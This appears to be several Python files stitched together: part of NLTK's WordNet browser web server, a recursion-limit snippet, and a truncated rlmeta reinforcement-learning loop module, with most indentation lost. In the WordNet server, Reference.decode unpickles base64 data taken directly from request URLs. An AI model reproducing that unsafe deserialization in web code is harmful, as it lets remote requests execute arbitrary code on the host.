+ "<p><b>python dbinfo_html.py</b>"
+ "<p>to produce it."
+ html_trailer
)
else:
# Handle files here.
word = sp
page = get_static_page_by_path(usp)
elif sp.startswith("search"):
# This doesn't seem to work with MWEs.
type = "text/html"
parts = (sp.split("?")[1]).split("&")
word = [
p.split("=")[1].replace("+", " ")
for p in parts
if p.startswith("nextWord")
][0]
page, word = page_from_word(word)
elif sp.startswith("lookup_"):
            # TODO: add a variation of this that takes a non-encoded word or MWE.
type = "text/html"
sp = sp[len("lookup_") :]
page, word = page_from_href(sp)
elif sp == "start_page":
# if this is the first request we should display help
# information, and possibly set a default word.
type = "text/html"
page, word = page_from_word("wordnet")
else:
type = "text/plain"
page = "Could not parse request: '%s'" % sp
# Send result.
self.send_head(type)
self.wfile.write(page.encode("utf8"))
def send_head(self, type=None):
self.send_response(200)
self.send_header("Content-type", type)
self.end_headers()
def log_message(self, format, *args):
global logfile
if logfile:
logfile.write(
"%s - - [%s] %s\n"
% (self.address_string(), self.log_date_time_string(), format % args)
)
def get_unique_counter_from_url(sp):
"""
Extract the unique counter from the URL if it has one. Otherwise return
null.
"""
pos = sp.rfind("%23")
if pos != -1:
return int(sp[(pos + 3) :])
else:
return None
def wnb(port=8000, runBrowser=True, logfilename=None):
"""
Run NLTK Wordnet Browser Server.
:param port: The port number for the server to listen on, defaults to
8000
:type port: int
:param runBrowser: True to start a web browser and point it at the web
server.
:type runBrowser: bool
"""
# The webbrowser module is unpredictable, typically it blocks if it uses
# a console web browser, and doesn't block if it uses a GUI webbrowser,
# so we need to force it to have a clear correct behaviour.
#
    # Normally the server should run for as long as the user wants. They
    # should ideally be able to control this from the UI by closing the
    # window or tab. Second best would be clicking a button to say
    # 'Shutdown' that first shuts down the server and closes the window or
    # tab, or exits the text-mode browser. Both of these are unfeasible.
#
# The next best alternative is to start the server, have it close when
# it receives SIGTERM (default), and run the browser as well. The user
# may have to shutdown both programs.
#
# Since webbrowser may block, and the webserver will block, we must run
# them in separate threads.
#
global server_mode, logfile
server_mode = not runBrowser
# Setup logging.
if logfilename:
try:
logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
except IOError as e:
            sys.stderr.write("Couldn't open %s for writing: %s\n" % (logfilename, e))
sys.exit(1)
else:
logfile = None
# Compute URL and start web browser
url = "http://localhost:" + str(port)
server_ready = None
browser_thread = None
if runBrowser:
server_ready = threading.Event()
browser_thread = startBrowser(url, server_ready)
# Start the server.
server = HTTPServer(("", port), MyServerHandler)
if logfile:
logfile.write("NLTK Wordnet browser server running serving: %s\n" % url)
if runBrowser:
server_ready.set()
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if runBrowser:
browser_thread.join()
if logfile:
logfile.close()
def startBrowser(url, server_ready):
def run():
server_ready.wait()
time.sleep(1) # Wait a little bit more, there's still the chance of
# a race condition.
webbrowser.open(url, new=2, autoraise=1)
t = threading.Thread(target=run)
t.start()
return t
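# Hedged usage sketch (comments only): running the browser-less server on a
# custom port with logging, equivalent to "browserver.py -s -p 8080 -l wn.log":
#
#     wnb(port=8080, runBrowser=False, logfilename="wn.log")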
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
return [
(wn.NOUN, "N", "noun"),
(wn.VERB, "V", "verb"),
(wn.ADJ, "J", "adj"),
(wn.ADV, "R", "adv"),
]
def _pos_match(pos_tuple):
"""
This function returns the complete pos tuple for the partial pos
tuple given to it. It attempts to match it against the first
non-null component of the given pos tuple.
"""
if pos_tuple[0] == "s":
pos_tuple = ("a", pos_tuple[1], pos_tuple[2])
for n, x in enumerate(pos_tuple):
if x is not None:
break
for pt in _pos_tuples():
if pt[n] == pos_tuple[n]:
return pt
return None
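# Hedged usage sketch (the helper below is ours, for illustration only):
# _pos_match completes a partial pos tuple from its first non-null component.
def _pos_match_examples():
    assert _pos_match((wn.VERB, None, None)) == (wn.VERB, "V", "verb")
    assert _pos_match((None, "R", None)) == (wn.ADV, "R", "adv")
    # satellite adjectives ("s") are folded into the plain adjective entry
    assert _pos_match(("s", None, None)) == (wn.ADJ, "J", "adj")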
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
def flattern(l):
if l == []:
return []
else:
return l[0] + flattern(l[1:])
    return flattern([func(l) for l in synset.lemmas() if l.name() == word])
def rebuild_tree(orig_tree):
node = orig_tree[0]
children = orig_tree[1:]
return (node, [rebuild_tree(t) for t in children])
def get_relations_data(word, synset):
"""
Get synset relations data for a synset. Note that this doesn't
yet support things such as full hyponym vs direct hyponym.
"""
if synset.pos() == wn.NOUN:
return (
(HYPONYM, "Hyponyms", synset.hyponyms()),
(INSTANCE_HYPONYM, "Instance hyponyms", synset.instance_hyponyms()),
(HYPERNYM, "Direct hypernyms", synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
"Indirect hypernyms",
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
# hypernyms', 'Sister terms',
(INSTANCE_HYPERNYM, "Instance hypernyms", synset.instance_hypernyms()),
# (CLASS_REGIONAL, ['domain term region'], ),
(PART_HOLONYM, "Part holonyms", synset.part_holonyms()),
(PART_MERONYM, "Part meronyms", synset.part_meronyms()),
(SUBSTANCE_HOLONYM, "Substance holonyms", synset.substance_holonyms()),
(SUBSTANCE_MERONYM, "Substance meronyms", synset.substance_meronyms()),
(MEMBER_HOLONYM, "Member holonyms", synset.member_holonyms()),
(MEMBER_MERONYM, "Member meronyms", synset.member_meronyms()),
(ATTRIBUTE, "Attributes", synset.attributes()),
(ANTONYM, "Antonyms", lemma_property(word, synset, lambda l: l.antonyms())),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.VERB:
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
(HYPONYM, "Hyponym", synset.hyponyms()),
(HYPERNYM, "Direct hypernyms", synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
"Indirect hypernyms",
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
(ENTAILMENT, "Entailments", synset.entailments()),
(CAUSE, "Causes", synset.causes()),
(ALSO_SEE, "Also see", synset.also_sees()),
(VERB_GROUP, "Verb Groups", synset.verb_groups()),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
    elif synset.pos() == wn.ADJ or synset.pos() == wn.ADJ_SAT:
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
(SIMILAR, "Similar to", synset.similar_tos()),
# Participle of verb - not supported by corpus
(
PERTAINYM,
"Pertainyms",
lemma_property(word, synset, lambda l: l.pertainyms()),
),
(ATTRIBUTE, "Attributes", synset.attributes()),
(ALSO_SEE, "Also see", synset.also_sees()),
)
elif synset.pos() == wn.ADV:
        # This is weird: adverbs such as 'quick' and 'fast' don't seem
        # to have antonyms returned by the corpus.
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
)
# Derived from adjective - not supported by corpus
else:
raise TypeError("Unhandles synset POS type: " + str(synset.pos()))
html_header = """
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
"""
html_trailer = """
</body>
</html>
"""
explanation = """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
"""
# HTML oriented functions
def _bold(txt):
return "<b>%s</b>" % txt
def _center(txt):
return "<center>%s</center>" % txt
def _hlev(n, txt):
return "<h%d>%s</h%d>" % (n, txt, n)
def _italic(txt):
return "<i>%s</i>" % txt
def _li(txt):
return "<li>%s</li>" % txt
def pg(word, body):
"""
Return a HTML page of NLTK Browser format constructed from the
word and body
:param word: The word that the body corresponds to
:type word: str
:param body: The HTML body corresponding to the word
:type body: str
:return: a HTML page for the word-body combination
:rtype: str
"""
return (html_header % word) + body + html_trailer
def _ul(txt):
return "<ul>" + txt + "</ul>"
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold("<br>" * 10 + "*" * 10 + " " + txt + " " + "*" * 10))
full_hyponym_cont_text = _ul(_li(_italic("(has full hyponym continuation)"))) + "\n"
def _get_synset(synset_key):
"""
    The synset key is the unique name of the synset; this can be
    retrieved via synset.name()
"""
return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
"""
Returns the HTML string for one synset or word
:param word: the current word
:type word: str
:param synset: a synset
:type synset: synset
:param synset_relations: information about which synset relations
to display.
:type synset_relations: dict(synset_key, set(relation_id))
:return: The HTML string built for this synset
:rtype: str
"""
if isinstance(synset, tuple): # It's a word
raise NotImplementedError("word not supported by _collect_one_synset")
typ = "S"
pos_tuple = _pos_match((synset.pos(), None, None))
assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
descr = pos_tuple[2]
ref = copy.deepcopy(Reference(word, synset_relations))
ref.toggle_synset(synset)
synset_label = typ + ";"
if synset.name() in synset_relations:
synset_label = _bold(synset_label)
s = "<li>%s (%s) " % (make_lookup_link(ref, synset_label), descr)
def format_lemma(w):
w = w.replace("_", " ")
if w.lower() == word:
return _bold(w)
else:
ref = Reference(w)
return make_lookup_link(ref, w)
s += ", ".join(format_lemma(l.name()) for l in synset.lemmas())
gl = " (%s) <i>%s</i> " % (
synset.definition(),
"; ".join('"%s"' % e for e in synset.examples()),
)
return s + gl + _synset_relations(word, synset, synset_relations) + "</li>\n"
def _collect_all_synsets(word, pos, synset_relations=dict()):
"""
Return a HTML unordered list of synsets for the given word and
part of speech.
"""
return "<ul>%s\n</ul>\n" % "".join(
(
_collect_one_synset(word, synset, synset_relations)
for synset in wn.synsets(word, pos)
)
)
def _synset_relations(word, synset, synset_relations):
"""
Builds the HTML string for the relations of a synset
:param word: The current word
:type word: str
:param synset: The synset for which we're building the relations.
:type synset: Synset
:param synset_relations: synset keys and relation types for which to display relations.
:type synset_relations: dict(synset_key, set(relation_type))
:return: The HTML for a synset's relations
:rtype: str
"""
if not synset.name() in synset_relations:
return ""
ref = Reference(word, synset_relations)
def relation_html(r):
if isinstance(r, Synset):
return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
elif isinstance(r, Lemma):
return relation_html(r.synset())
elif isinstance(r, tuple):
# It's probably a tuple containing a Synset and a list of
# similar tuples. This forms a tree of synsets.
return "%s\n<ul>%s</ul>\n" % (
relation_html(r[0]),
"".join("<li>%s</li>\n" % relation_html(sr) for sr in r[1]),
)
else:
raise TypeError(
"r must be a synset, lemma or list, it was: type(r) = %s, r = %s"
% (type(r), r)
)
def make_synset_html(db_name, disp_name, rels):
synset_html = "<i>%s</i>\n" % make_lookup_link(
copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
disp_name,
)
if db_name in ref.synset_relations[synset.name()]:
synset_html += "<ul>%s</ul>\n" % "".join(
"<li>%s</li>\n" % relation_html(r) for r in rels
)
return synset_html
html = (
"<ul>"
+ "\n".join(
(
"<li>%s</li>" % make_synset_html(*rel_data)
for rel_data in get_relations_data(word, synset)
if rel_data[2] != []
)
)
+ "</ul>"
)
return html
class Reference(object):
"""
A reference to a page that may be generated by page_word
"""
def __init__(self, word, synset_relations=dict()):
"""
Build a reference to a new page.
        word is the word or words (separated by commas) for which to
        search for synsets.
        synset_relations is a dictionary mapping synset keys to sets of
        synset relation identifiers for which to unfold the list of
        synset relations.
"""
self.word = word
self.synset_relations = synset_relations
def encode(self):
"""
Encode this reference into a string to be used in a URL.
"""
# This uses a tuple rather than an object since the python
# pickle representation is much smaller and there is no need
# to represent the complete object.
string = pickle.dumps((self.word, self.synset_relations), -1)
return base64.urlsafe_b64encode(string).decode()
@staticmethod
def decode(string):
"""
Decode a reference encoded with Reference.encode
"""
string = base64.urlsafe_b64decode(string.encode())
word, synset_relations = pickle.loads(string)
return Reference(word, synset_relations)
def toggle_synset_relation(self, synset, relation):
"""
Toggle the display of the relations for the given synset and
relation type.
This function will throw a KeyError if the synset is currently
not being displayed.
"""
if relation in self.synset_relations[synset.name()]:
self.synset_relations[synset.name()].remove(relation)
else:
self.synset_relations[synset.name()].add(relation)
return self
def toggle_synset(self, synset):
"""
Toggle displaying of the relation types for the given synset
"""
if synset.name() in self.synset_relations:
del self.synset_relations[synset.name()]
else:
self.synset_relations[synset.name()] = set()
return self
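# Hedged usage sketch (the helper below is ours, for illustration only):
# a Reference survives the pickle + urlsafe-base64 round trip used in links.
def _reference_roundtrip_example():
    ref = Reference("green", {"green.n.01": {HYPERNYM}})
    encoded = ref.encode()            # URL-safe string
    decoded = Reference.decode(encoded)
    assert decoded.word == "green"
    assert HYPERNYM in decoded.synset_relations["green.n.01"]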
def make_lookup_link(ref, label):
return '<a href="lookup_%s">%s</a>' % (ref.encode(), label)
def page_from_word(word):
"""
Return a HTML page for the given word.
:type word: str
:param word: The currently active word
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference(word))
def page_from_href(href):
"""
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference.decode(href))
def page_from_reference(href):
"""
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
word = href.word
pos_forms = defaultdict(list)
words = word.split(",")
words = [w for w in [w.strip().lower().replace(" ", "_") for w in words] if w != ""]
if len(words) == 0:
# No words were found.
return "", "Please specify a word to search for."
# This looks up multiple words at once. This is probably not
# necessary and may lead to problems.
for w in words:
for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
form = wn.morphy(w, pos)
if form and form not in pos_forms[pos]:
pos_forms[pos].append(form)
body = ""
for pos, pos_str, name in _pos_tuples():
if pos in pos_forms:
body += _hlev(3, name) + "\n"
for w in pos_forms[pos]:
# Not all words of exc files are in the database, skip
# to the next word if a KeyError is raised.
try:
body += _collect_all_synsets(w, pos, href.synset_relations)
except KeyError:
pass
if not body:
body = "The word or words '%s' where not found in the dictonary." % word
return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
"""
Return a static HTML page from the path given.
"""
if path == "index_2.html":
return get_static_index_page(False)
elif path == "index.html":
return get_static_index_page(True)
elif path == "NLTK Wordnet Browser Database Info.html":
return "Display of Wordnet Database Statistics is not supported"
elif path == "upper_2.html":
return get_static_upper_page(False)
elif path == "upper.html":
return get_static_upper_page(True)
elif path == "web_help.html":
return get_static_web_help_page()
elif path == "wx_help.html":
return get_static_wx_help_page()
else:
return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
"""
Return the static web help page.
"""
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you can see, the search result includes the synsets found in the same order as the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program, i.e. for the client that is automatically launched when the BrowServer is started, but not for the succeeding clients, in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
"""
Get the static welcome page.
"""
return """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
"""
Get the static index page.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
if with_shutdown:
upper_link = "upper.html"
else:
upper_link = "upper_2.html"
return template % upper_link
def get_static_upper_page(with_shutdown):
"""
    Return the upper frame page.
    If with_shutdown is True then a 'shutdown' button is also provided
    to shut down the server.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
if with_shutdown:
shutdown_link = '<a href="SHUTDOWN THE SERVER">Shutdown</a>'
else:
shutdown_link = ""
return template % shutdown_link
def usage():
"""
Display the command line help message.
"""
print(__doc__)
def app():
# Parse and interpret options.
(opts, _) = getopt.getopt(
argv[1:], "l:p:sh", ["logfile=", "port=", "server-mode", "help"]
)
port = 8000
server_mode = False
help_mode = False
logfilename = None
for (opt, value) in opts:
if (opt == "-l") or (opt == "--logfile"):
logfilename = str(value)
elif (opt == "-p") or (opt == "--port"):
port = int(value)
elif (opt == "-s") or (opt == "--server-mode"):
server_mode = True
elif (opt == "-h") or (opt == "--help"):
help_mode = True
if help_mode:
usage()
else:
wnb(port, not server_mode, logfilename)
if __name__ == "__main__":
app()
__all__ = ["app"]
|
increase_recursion_limit.py
|
import sys
if "PyPy" in sys.version:
from _continuation import continulet
else:
import threading
def main():
pass
if __name__ == "__main__":
if "PyPy" in sys.version:
def bootstrap(cont):
call, arg = cont.switch()
while True:
call, arg = cont.switch(
to=continulet(lambda _, f, args: f(*args), call, arg)
)
cont = continulet(bootstrap)
cont.switch()
main()
else:
sys.setrecursionlimit(1 << 30)
threading.stack_size(1 << 27)
main_thread = threading.Thread(target=main)
main_thread.start()
main_thread.join()
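# --- Hedged sketch (not part of the original snippet) ------------------------
# A deliberately deep recursion like the one below is what the larger stack /
# recursion limit (or the PyPy continulet trampoline) above makes possible;
# with CPython defaults it would hit RecursionError long before this depth.
def deep_count(n):
    """Recurse n levels deep and return n (illustration only)."""
    if n == 0:
        return 0
    return 1 + deep_count(n - 1)
# e.g. a main() body of "print(deep_count(1000000))" needs the setup above.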
|
loop.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import abc
import asyncio
import logging
import time
from typing import Dict, List, NoReturn, Optional, Sequence, Union
import torch
import torch.multiprocessing as mp
import moolib
import rlmeta.core.remote as remote
import rlmeta.utils.asycio_utils as asycio_utils
import rlmeta.utils.moolib_utils as moolib_utils
from rlmeta.agents.agent import Agent, AgentFactory
from rlmeta.core.controller import Controller, ControllerLike, Phase
from rlmeta.core.launchable import Launchable
from rlmeta.envs.env import Env, EnvFactory
class Loop(abc.ABC):
@abc.abstractmethod
def run(self, num_episodes: Optional[int] = None) -> None:
"""
"""
class AsyncLoop(Loop, Launchable):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: ControllerLike,
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._envs = []
self._agents = []
self._controller = controller
self._loop = None
self._tasks = []
self._running = False
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
@property
def running(self) -> bool:
return self._running
@running.setter
def running(self, running: bool) -> None:
self._running = running
def init_launching(self) -> None:
pass
def init_execution(self) -> None:
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, remote.Remote):
obj.name = moolib_utils.expend_name_by_index(
obj.name, self.index)
obj.connect()
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, Launchable):
obj.init_execution()
for i in range(self._num_rollouts):
env = self._env_factory(self.index_offset + i)
if self.seed is not None:
env.seed(self.seed + self.index_offset + i)
self._envs.append(env)
for i in range(self._num_rollouts):
agent = self._agent_factory(self.index_offset + i)
agent.connect()
# if self.seed is not None:
# agent.seed(self.seed + self.index_offset + i)
self._agents.append(agent)
def run(self) -> NoReturn:
self._loop = asyncio.get_event_loop()
self._tasks.append(
asycio_utils.create_task(self._loop, self._check_phase()))
for i, (env, agent) in enumerate(zip(self._envs, self._agents)):
task = asycio_utils.create_task(
self._loop, self._run_loop(env, agent, self.index_offset + i))
self._tasks.append(task)
try:
self._loop.run_forever()
except Exception as e:
logging.error(e)
raise e
finally:
for task in self._tasks:
task.cancel()
self._loop.stop()
async def _check_phase(self) -> NoReturn:
while True:
cur_phase = await self._controller.async_get_phase()
self._running = (cur_phase == self.running_phase)
await asyncio.sleep(1)
async def _run_loop(self,
env: Env,
agent: Agent,
index: int = 0) -> NoReturn:
while True:
while not self.running:
await asyncio.sleep(1)
stats = await self._run_episode(env, agent, index)
if stats is not None:
await self._controller.async_add_episode(stats)
# Similar loop as DeepMind's Acme
# https://github.com/deepmind/acme/blob/master/acme/environment_loop.py#L68
async def _run_episode(self,
env: Env,
agent: Agent,
index: int = 0) -> Optional[Dict[str, float]]:
episode_length = 0
episode_return = 0.0
start_time = time.perf_counter()
timestep = env.reset()
await agent.async_observe_init(timestep)
while not timestep.done:
if not self.running:
return None
action = await agent.async_act(timestep)
timestep = env.step(action)
await agent.async_observe(action, timestep)
if self.should_update:
await agent.async_update()
episode_length += 1
episode_return += timestep.reward
episode_time = time.perf_counter() - start_time
steps_per_second = episode_length / episode_time
return {
"episode_length": float(episode_length),
"episode_return": episode_return,
"episode_time/s": episode_time,
"steps_per_second": steps_per_second,
}
class ParallelLoop(Loop):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: Union[Controller, remote.Remote],
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
num_workers: Optional[int] = None,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
self._num_workers = min(mp.cpu_count(), self._num_rollouts)
if num_workers is not None:
self._num_workers = min(self._num_workers, num_workers)
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._controller = controller
self._workloads = self._compute_workloads()
self._async_loops = []
self._processes = []
index_offset = self._index_offset
for i, workload in enumerate(self._workloads):
loop = AsyncLoop(self._env_factory, self._agent_factory,
self._controller, self.running_phase,
self.should_update, workload, i, index_offset,
self.seed)
self._async_loops.append(loop)
index_offset += workload
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def num_workers(self) -> int:
return self._num_workers
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
def run(self) -> NoReturn:
self.start()
self.join()
def start(self) -> None:
processes = []
for loop in self._async_loops:
loop.init_launching()
process = mp.Process(target=self._run_async_loop, args=(loop,))
processes.append(process)
for process in processes:
process.start()
self._processes = processes
def join(self) -> None:
for process in self._processes:
process.join()
def terminate(self) -> None:
for process in self._processes:
process.terminate()
def _compute_workloads(self) -> List[int]:
workload = self.num_rollouts // self.num_workers
r = self.num_rollouts % self.num_workers
workloads = [workload + 1] * r + [workload] * (self.num_workers - r)
return workloads
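        # Hedged worked example (comments only): with num_rollouts=10 and
        # num_workers=3, workload is 3 and r is 1, so the split is [4, 3, 3];
        # the remainder is spread as one extra rollout per leading worker.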
def _run_async_loop(self, loop: AsyncLoop) -> NoReturn:
if loop.seed is not None:
torch.manual_seed(loop.seed + loop.index_offset)
loop.init_execution()
loop.run()
class LoopList:
def __init__(self, loops: Optional[Sequence[Loop]] = None) -> None:
self._loops = []
if loops is not None:
self._loops.extend(loops)
@property
